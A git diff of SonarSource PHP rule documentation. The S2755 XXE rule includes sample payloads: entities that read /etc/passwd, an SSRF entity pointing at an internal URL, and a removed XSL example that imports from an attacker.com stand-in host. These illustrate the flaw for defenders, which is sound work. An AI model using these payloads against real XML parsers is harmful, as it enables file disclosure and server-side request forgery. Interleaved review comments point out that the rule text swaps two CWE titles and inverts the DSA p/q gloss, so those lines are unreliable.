diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html index 514b7e5bf9..64f6b515e5 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html @@ -1,6 +1,6 @@A test case without assertions ensures only that no exceptions are thrown. Beyond basic runnability, it ensures nothing about the behavior of the code under test.
-This rule raised an issue when no assertions are found within a PHPUnit test method.
+This rule raised an issue when no assertions are found within a PHPUnit test method.
Noncompliant Code Example
public function testDoSomething() { // Compliant diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html index e286f4ba60..0ae6aafa3b 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html @@ -1,5 +1,5 @@A
+it bubble up automatically, but with more code and the additional detriment of leaving maintainers scratching their heads.catch
clause that only rethrows the caught exception has the same effect as omitting thecatch
altogether and letting -it bubble up automatically, but with more code and the additional detriment of leaving maintainers scratching their heads.Such clauses should either be eliminated or populated with the appropriate logic.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html index ebe2887b14..679163d209 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html @@ -1,33 +1,32 @@ -XML specification allows the use of entities that can be internal or external (file system / -network access ...) which could lead to vulnerabilities such as confidential file disclosures or SSRFs.
-Example in this XML document, an external entity read the /etc/passwd file:
+XML standard allows the use of entities, declared in the DOCTYPE of the document, which can be internal or external.
+When parsing the XML file, the content of the external entities is retrieved from an external storage such as the file system or network, which may +lead, if no restrictions are put in place, to arbitrary file disclosures or server-side request forgery (SSRF) vulnerabilities.
<?xml version="1.0" encoding="utf-8"?> - <!DOCTYPE test [ - <!ENTITY xxe SYSTEM "file:///etc/passwd"> - ]> -<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> - <to>&xxe;</to> - <from>Jani</from> - <heading>Reminder</heading> - <body>Don't forget me this weekend!</body> -</note> --In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:
--<?xml version="1.0" encoding="UTF-8"?> -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl"> - <xsl:import href="http://www.attacker.com/evil.xsl"/> - <xsl:include href="http://www.attacker.com/evil.xsl"/> - <xsl:template match="/"> - &content; - </xsl:template> -</xsl:stylesheet> +<!DOCTYPE person [ + <!ENTITY file SYSTEM "file:///etc/passwd"> + <!ENTITY ssrf SYSTEM "https://internal.network/sensitive_information"> +]> + +<person> + <name>&file;</name> + <city>&ssrf;</city> + <age>18</age> +</person>-It is recommended to disable access to external entities and network access in general.
-Noncompliant Code Examples
+It’s recommended to limit resolution of external entities by using one of these solutions:
++
+- If DOCTYPE is not necessary, completely disable all DOCTYPE declarations.
+- If external entities are not necessary, completely disable their declarations.
+- If external entities are necessary then: +
++
- Use XML processor features, if available, to authorize only required protocols (eg: https).
+- And use an entity resolver (and optionally an XML Catalog) to resolve only trusted entities.
+Noncompliant Code Example
SimpleXML object:
$xml = file_get_contents("xxe.xml");
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json
index 844f6717a4..0c755d53fb 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json
@@ -1,14 +1,12 @@
 {
- "title": "\"=+\" should not be used instead of \"+=\"",
+ "title": "\"\u003d+\" should not be used instead of \"+\u003d\"",
 "type": "BUG",
 "status": "ready",
 "remediation": {
 "func": "Constant\/Issue",
 "constantCost": "2min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-2757",
 "sqKey": "S2757",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json
index 7600569660..db0d969e3b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-2761",
 "sqKey": "S2761",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html
index c6c4d10fa7..8ca4a15df5 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html
@@ -1,5 +1,5 @@Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a -dependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own +dependent object (or client) and are made part of the client’s state. The pattern separates the creation of a client’s dependencies from its own behavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html index ff5477fb5f..45c683cb11 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html @@ -1,6 +1,6 @@ -+
ini_set
changes the value of the given configuration option for the duration of the script's execution. While there may be a reason to -do this, you should make sure that it's a very good reason indeed, because this is the sort of "magic" change which can cause severe teeth-gnashing -and hair tearing when the script needs to be debugged.
ini_set
changes the value of the given configuration option for the duration of the script’s execution. While there may be a reason to +do this, you should make sure that it’s a very good reason indeed, because this is the sort of "magic" change which can cause severe teeth-gnashing +and hair tearing when the script needs to be debugged.For instance, if the user explicitly turns logging on for a script, but then the script itself uses
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json
index 775282f3d9..ffa13ddb6b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "15min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Minor",
 "ruleSpecification": "RSPEC-2964",
 "sqKey": "S2964",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json
index 9da744340e..f7449cb9f2 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "30min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-3011",
 "sqKey": "S3011",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html
index 78194b467d..60b3514a46 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html
@@ -1,7 +1,7 @@ini_set('display_errors', 0);
to turn logging back off, it is likely that every other aspect of the environment will be examined before, in desperation, the script is read to figure out where the logging is going.When a cookie is configured with the
HttpOnly
attribute set to true, the browser guaranties that no client-side script will -be able to read it. In most cases, when a cookie is created, the default value ofHttpOnly
is false and it's up to the developer +be able to read it. In most cases, when a cookie is created, the default value ofHttpOnly
is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target -the theft of session-cookies, theHttpOnly
attribute can help to reduce their impact as it won't be possible to exploit the XSS +the theft of session-cookies, theHttpOnly
attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.Ask Yourself Whether
@@ -12,7 +12,7 @@
Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
-
- By default the
HttpOnly
flag should be set to true for most of the cookies and it's mandatory for session / +- By default the
HttpOnly
flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.Sensitive Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html index 44682270d8..9c7a657acf 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html @@ -1,7 +1,7 @@ -A cookie's domain specifies which websites should be able to read it. Left blank, browsers are supposed to only send the cookie to sites that +
A cookie’s domain specifies which websites should be able to read it. Left blank, browsers are supposed to only send the cookie to sites that exactly match the sending domain. For example, if a cookie was set by lovely.dream.com, it should only be readable by that domain, and not by nightmare.com or even strange.dream.com. If you want to allow sub-domain access for a cookie, you can specify it by adding a dot in -front of the cookie's domain, like so: .dream.com. But cookie domains should always use at least two levels.
+front of the cookie’s domain, like so: .dream.com. But cookie domains should always use at least two levels.Cookie domains can be set either programmatically or via configuration. This rule raises an issue when any cookie domain is set with a single level, as in .com.
Ask Yourself Whether
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json
index 609ab8c059..5bdbeddee8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Info",
 "ruleSpecification": "RSPEC-3331",
 "sqKey": "S3331",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html
index 31f5243cd5..208d11b33d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3333.html
@@ -2,7 +2,7 @@fopen()
. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access files outside the allowed path.
open_basedir
should be configured with a directory, which will then be accessible recursively. However, the use of.
-(current directory) as anopen_basedir
value should be avoided since it's resolved dynamically during script execution, so a +(current directory) as anopen_basedir
value should be avoided since it’s resolved dynamically during script execution, so achdir('/')
command could lay the whole server open to the script.This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence step. This rule raises an issue when
open_basedir
is not present in php.ini, and whenopen_basedir
contains root, diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html index 69a0ecf236..048aed6421 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3334.html @@ -1,4 +1,4 @@ -
allow_url_fopen
andallow_url_include
allow code to be read into a script from URL's. The ability to suck in executable +
allow_url_fopen
andallow_url_include
allow code to be read into a script from URL’s. The ability to suck in executable code from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect today, are you prepared to bet your site that it will always be perfect in the future?This rule raises an issue when either property is explicitly enabled in php.ini and when
allow_url_fopen
, which defaults to diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html index 22c85e0622..7d5cca5b30 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3336.html @@ -1,13 +1,13 @@ -PHP's
session.use_trans_sid
automatically appends the user's session id to urls when cookies are disabled. On the face of it, this +PHP’s
session.use_trans_sid
automatically appends the user’s session id to urls when cookies are disabled. On the face of it, this seems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked by anyone who might:-
-- see the URL over the user's shoulder
+- see the URL over the user’s shoulder
- be sent the URL by the user
- retrieve the URL from browser history
-- ...
+- …
For that reason, it's better to practice a little "tough love" with your users and force them to turn on cookies.
+For that reason, it’s better to practice a little "tough love" with your users and force them to turn on cookies.
Since
session.use_trans_sid
is off by default, this rule raises an issue when it is explicitly enabled.Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html index 652007c35e..b75c0f6fd6 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3337.html @@ -1,5 +1,5 @@+ignored. For that reason, it’s a dangerous option and should be explicitly turned off.
enable_dl
is on by default and allowsopen_basedir
restrictions, which limit the files a script can access, to be -ignored. For that reason, it's a dangerous option and should be explicitly turned off.This rule raises an issue when
enable_dl
is not explicitly set to 0 in php.ini.Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html index 39c1c84810..cb556bd754 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.html @@ -1,4 +1,4 @@ --
file_uploads
is an on-by-default PHP configuration that allows files to be uploaded to your site. Since acceptingcandy+
file_uploads
is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting candy files from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.This rule raises an issue when
file_uploads
is not explicitly disabled.Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json
index f889d6dcad..896dbca699 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3338.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Blocker",
 "ruleSpecification": "RSPEC-3338",
 "sqKey": "S3338",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html
index 7de43e64ae..326fe3dc15 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3358.html
@@ -1,4 +1,4 @@
-Just because you can do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators
Just because you can do something, doesn’t mean you should, and that’s the case with nested ternary operations. Nesting ternary operators results in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you) scratching their heads and cursing.
Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json
index 32004084fa..6902b02900 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3699.json
@@ -1,14 +1,12 @@
 {
- "title": "The output of functions that don't return anything should not be used",
+ "title": "The output of functions that don\u0027t return anything should not be used",
 "type": "BUG",
 "status": "ready",
 "remediation": {
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-3699",
 "sqKey": "S3699",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html
index d0044d63d7..f89d8a9b0f 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3801.html
@@ -20,7 +20,7 @@Compliant Solution
return false; }or
+or
function foo($a) { if ($a == 1) { diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html index f7daa99eef..bbfb390b77 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.html @@ -1,5 +1,5 @@Having all branches in a
+and something different should be executed, or there shouldn’t be aswitch
orif
chain with the same implementation is an error. Either a copy-paste error was made -and something different should be executed, or there shouldn't be aswitch
/if
chain at all.switch
/if
chain at all.Noncompliant Code Example
if ($b == 0) { // Noncompliant
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json
index c54f5efbeb..2d949d3bd3 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3923.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "15min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-3923",
 "sqKey": "S3923",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html
index ef2d6ef0e7..0cb2888e40 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.html
@@ -1,6 +1,6 @@The count of elements from an array or Countable object is always greater than or equal to zero. So testing that the count is greater than or equal
+to zero doesn’t make sense, since the result is alwaystrue
. Similarly testing that it is less than zero will always return -false
. Perhaps the intent was to check the non-emptiness of the object or array instead.true
. Similarly testing that it is less than zero will always return +false
. Perhaps the intent was to check the non-emptiness of the object or array instead.Noncompliant Code Example
if (count($arr) >= 0) { ... }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json
index 93b1b55960..d97bbdc5aa 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3981.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "2min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-3981",
 "sqKey": "S3981",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json
index 0045f516ef..f17133e3df 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4142.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-4142",
 "sqKey": "S4142",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html
index a81eb465e4..3d3e1c3cd6 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.html
@@ -23,6 +23,10 @@See
OWASP Top 10 2017 Category A6 - Security Misconfiguration +Mobile AppSec Verification + Standard - Network Communication Requirements +OWASP Mobile Top 10 2016 Category M3 - Insecure + Communication MITRE, CWE-327 - Inadequate Encryption Strength MITRE, CWE-326 - Use of a Broken or Risky Cryptographic Algorithm SANS Top 25 - Porous Defenses
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json
index 162685e2d1..04c521f5db 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4423.json
@@ -11,7 +11,8 @@
 "privacy",
 "owasp-a6",
 "sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
 ],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4423",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html
index 7361b16460..95ec61f5d4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.html
@@ -1,18 +1,18 @@Most of cryptographic systems require a sufficient key size to be robust against brute-force attacks.
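Review bot: The two MITRE entries in this See list carry each other's titles: CWE-326 is "Inadequate Encryption Strength" and CWE-327 is "Use of a Broken or Risky Cryptographic Algorithm", so the items should read `MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm` and `MITRE, CWE-326 - Inadequate Encryption Strength`. The anchor hrefs are not visible in this rendering, so whoever corrects the labels should also confirm each link points at the cwe.mitre.org page matching its number. The S4426 See list further down lists CWE-326 with the correct title, so the two rules currently contradict each other on the same identifier.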
NIST recommendations will be checked for these use-cases:
-Digital Signature Generation and Verification:
+Digital Signature Generation and Verification:
-
- p ≥ 2048 AND q ≥ 224 for DSA (
p
is key length andq
the modulus length)- n ≥ 2048 for RSA (
n
is the key length)Key Agreement:
+Key Agreement:
-
- p ≥ 2048 AND q ≥ 224 for DH and MQV
- n ≥ 224 for ECDH and ECMQV (Examples:
secp192r1
is a non-compliant curve (n
< 224) butsecp224k1
is compliant (n
>= 224))Symmetric keys:
+Symmetric keys:
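Review bot: The parameter gloss on the DSA line, "p is key length and q the modulus length", is inverted: in FIPS 186-4 and SP 800-57 p is the prime modulus (length L, e.g. 2048) and q is the prime subgroup order (length N, e.g. 224), so the parenthetical should read `(p is the modulus length and q the subgroup-order length)`. The DH and MQV line in the Key Agreement section uses the same p and q with no gloss, so a reader will carry the swapped meaning over to it; one identical short note there would prevent that. This is a context line the commit did not touch, but it is the text that ships with the rule.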
@@ -41,6 +41,10 @@
- key length ≥ 128 bits
See
OWASP Top 10 2017 Category A6 - Security Misconfiguration +Mobile AppSec + Verification Standard - Cryptography Requirements +OWASP Mobile Top 10 2016 Category M5 - + Insufficient Cryptography NIST 800-131A - Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths MITRE, CWE-326 - Inadequate Encryption Strength
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json
index b221771b40..0d39b68b57 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4426.json
@@ -10,7 +10,8 @@
 "cwe",
 "privacy",
 "owasp-a6",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
 ],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4426",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html
index c7529a69d0..76fff8792e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4433.html
@@ -7,7 +7,7 @@Name/Password Authentication Mechanism by performing a bind request with a password value of non-zero length.
+strongly discouraged.Noncompliant Code Example
$ldapconn = ldap_connect("ldap.example.com"); diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html index 8c019f00a1..83bebc366a 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4502.html @@ -1,5 +1,5 @@A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive -actions that he didn't intend, such as updating his profile or sending a message, more generally anything that can change the state of the +actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.
The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.
@@ -17,7 +17,7 @@Recommended Secure Coding Practices
to be activated by default for all unsafe HTTP methods. implemented, for example, with an unguessable CSRF token - +Of course all sensitive operations should not be performed with safe HTTP methods like diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html index 654295b212..5039a8fb01 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.html @@ -5,11 +5,11 @@ vulnerabilityGET
which are designed to be used only for information retrieval.Object deserialization from an untrusted source can lead to unexpected code execution. Deserialization takes a stream of bits and turns it into an -object. If the stream contains the type of object you expect, all is well. But if you're deserializing data coming from untrusted input, and an -attacker has inserted some other type of object, you're in trouble. Why? A known attack -scenario involves the creation of a serialized PHP object with crafted attributes which will modify your application's behavior. This attack +object. If the stream contains the type of object you expect, all is well. But if you’re deserializing data coming from untrusted input, and an +attacker has inserted some other type of object, you’re in trouble. Why? A known attack +scenario involves the creation of a serialized PHP object with crafted attributes which will modify your application’s behavior. This attack relies on PHP magic methods like
__desctruct
,__wakeup
or -__string
. The attacker doesn't necessarily need the source code of the targeted application to exploit the vulnerability, he can also +__string
. The attacker doesn’t necessarily need the source code of the targeted application to exploit the vulnerability, he can also rely on the presence of open-source component and use tools to craft malicious payloads.Ask Yourself Whether
@@ -26,7 +26,7 @@
Recommended Secure Coding Practices
+
- if it is a file, restrict the access to it.
- if it comes from the network, restrict who has access to the process, such as with a Firewall or by authenticating the sender first.
-See
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json
index 2a66791068..6b22bc3ab6 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4508.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "15min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4508",
 "sqKey": "S4508",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json
index 7c98262c45..ede14d3c53 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4524.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4524",
 "sqKey": "S4524",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html
index a2a163de97..c4ccef9107 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.html
@@ -42,7 +42,7 @@
Note that
-ereg*
functions have been removed in PHP 7 and PHP 5 end of life date is the 1st of January 2019. Using PHP 5 is dangerous as there will be no security fix.This rule's goal is to guide security code reviews.
+This rule’s goal is to guide security code reviews.
Ask Yourself Whether
-
- the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
@@ -53,9 +53,9 @@Recommended Secure Coding Practices
Do not set the constant
pcre.backtrack_limit
to a high value as it will increase the resource consumption of PCRE functions.Check the error codes of PCRE functions via
preg_last_error
.Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for -vulnerability reports mentioning the one engine you're are using. Do not run vulnerable regular expressions on user input.
+vulnerability reports mentioning the one engine you’re are using. Do not run vulnerable regular expressions on user input.Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.
-Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won't detect this kind of injection.
+Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.
Avoid executing a user input string as a regular expression or use at least
preg_quote
to escape regular expression characters.Exceptions
